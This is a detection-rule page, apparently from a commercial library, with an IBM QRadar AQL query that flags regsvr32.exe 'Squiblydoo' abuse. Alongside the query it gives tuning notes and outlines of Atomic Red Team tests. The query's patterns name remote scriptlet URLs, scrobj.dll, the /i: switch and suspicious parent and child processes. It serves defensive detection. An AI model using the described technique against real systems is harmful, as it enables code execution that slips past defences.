Detect Regsvr32 in IBM QRadar
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including DLLs, on Windows systems. The 'Squiblydoo' variation passes a URL to a remote COM scriptlet file (SCT) that executes without registry changes, making no persistent artifacts. This technique is widely used by QakBot, Emotet, Dridex, Valak, Astaroth, TA551, and many APTs including APT32, APT29, Kimsuky, Cobalt Group, Leviathan, and Storm-0501. It is one of the most abused LOLBins in the threat landscape.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1218 System Binary Proxy Execution
- Sub-technique
- T1218.010 Regsvr32
- Canonical reference
- https://attack.mitre.org/techniques/T1218/010/
QRadar Detection Query
SELECT
DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS EventTime,
LOGSOURCETYPENAME(devicetype) AS LogSourceType,
sourceip AS SourceIP,
username AS Username,
"Image" AS ProcessImage,
"CommandLine" AS ProcessCommandLine,
"ParentImage" AS ParentImage,
"ParentCommandLine" AS ParentCommandLine,
CASE WHEN LOWER("CommandLine") SIMILAR TO '%http://%' OR LOWER("CommandLine") SIMILAR TO '%https://%' THEN 1 ELSE 0 END AS RemoteSCT,
CASE WHEN LOWER("CommandLine") SIMILAR TO '%scrobj%' THEN 1 ELSE 0 END AS ScrObj,
CASE WHEN LOWER("CommandLine") SIMILAR TO '%/i:%' THEN 1 ELSE 0 END AS InlineScript,
CASE WHEN LOWER("CommandLine") SIMILAR TO '%(temp|appdata|downloads|public|desktop|programdata)%' THEN 1 ELSE 0 END AS SuspiciousPath,
CASE WHEN LOWER("ParentImage") SIMILAR TO '%(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)%.exe%' THEN 1 ELSE 0 END AS SuspiciousParent,
CASE WHEN LOWER("ParentImage") SIMILAR TO '%\\regsvr32.exe' AND LOWER("Image") SIMILAR TO '%(cmd|powershell|wscript|cscript|rundll32|certutil)%.exe%' THEN 1 ELSE 0 END AS SuspiciousChild
FROM events
WHERE
starttime > DATEADD('hour', -24, NOW())
AND LOGSOURCETYPEID(devicetype) IN (12, 52, 198, 433)
AND (
LOWER("Image") SIMILAR TO '%\\regsvr32.exe'
OR LOWER("ParentImage") SIMILAR TO '%\\regsvr32.exe'
)
AND (
LOWER("CommandLine") SIMILAR TO '%http://%'
OR LOWER("CommandLine") SIMILAR TO '%https://%'
OR LOWER("CommandLine") SIMILAR TO '%scrobj%'
OR LOWER("CommandLine") SIMILAR TO '%/i:%'
OR LOWER("ParentImage") SIMILAR TO '%(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)%.exe%'
OR (
LOWER("ParentImage") SIMILAR TO '%\\regsvr32.exe'
AND LOWER("Image") SIMILAR TO '%(cmd|powershell|wscript|cscript|rundll32|certutil)%.exe%'
)
)
ORDER BY starttime DESCIBM QRadar AQL detection for regsvr32.exe abuse targeting Sysmon ProcessCreate events (EventID 1) parsed by the Microsoft Windows DSM. Identifies remote SCT (Squiblydoo) via HTTP/S URLs, scrobj.dll COM scriptlet loading, inline /i: script execution, suspicious Office and script-host parent processes, and dangerous binaries spawned as children of regsvr32.exe. LOGSOURCETYPEID values cover Windows Security, Sysmon, and Snare-formatted Windows logs.
Data Sources
Required Tables
False Positives & Tuning
- Automated software distribution systems (SCCM, Intune, PDQ Deploy) that legitimately invoke regsvr32.exe from cmd.exe or powershell.exe wrappers as part of COM component registration during managed deployments
- Software vendors whose installer packages use ProgramData or AppData staging paths before calling regsvr32.exe, triggering the suspicious-path heuristic on otherwise benign setups
- Security and EDR vendors whose agents spawn regsvr32.exe during telemetry collection or hook injection, which may appear as a suspicious parent-child relationship
Other platforms for T1218.010
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Squiblydoo - Regsvr32 Remote SCT Execution
Expected signal: Sysmon Event ID 1: regsvr32.exe with /s /n /u /i: URL and scrobj.dll in command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. Security Event ID 4688. Sysmon Event ID 7: scrobj.dll loaded by regsvr32.exe.
- Test 2Regsvr32 DLL Execution from Temp Directory
Expected signal: Sysmon Event ID 11: DLL written to Temp. Sysmon Event ID 1: regsvr32.exe with /s and Temp path. Sysmon Event ID 7: DLL loaded by regsvr32.exe. Security Event ID 4688.
- Test 3Regsvr32 Launched from PowerShell Parent
Expected signal: Sysmon Event ID 1: powershell.exe then regsvr32.exe with ParentImage=powershell.exe. SuspiciousParent fires. Security Event ID 4688 for both. Regsvr32 will fail (no valid DLL) but the process creation event fires.
References (6)
- https://attack.mitre.org/techniques/T1218/010/
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
- https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
- https://support.microsoft.com/en-us/kb/249873
Unlock Pro Content
Get the full detection package for T1218.010 including response playbook, investigation guide, and atomic red team tests.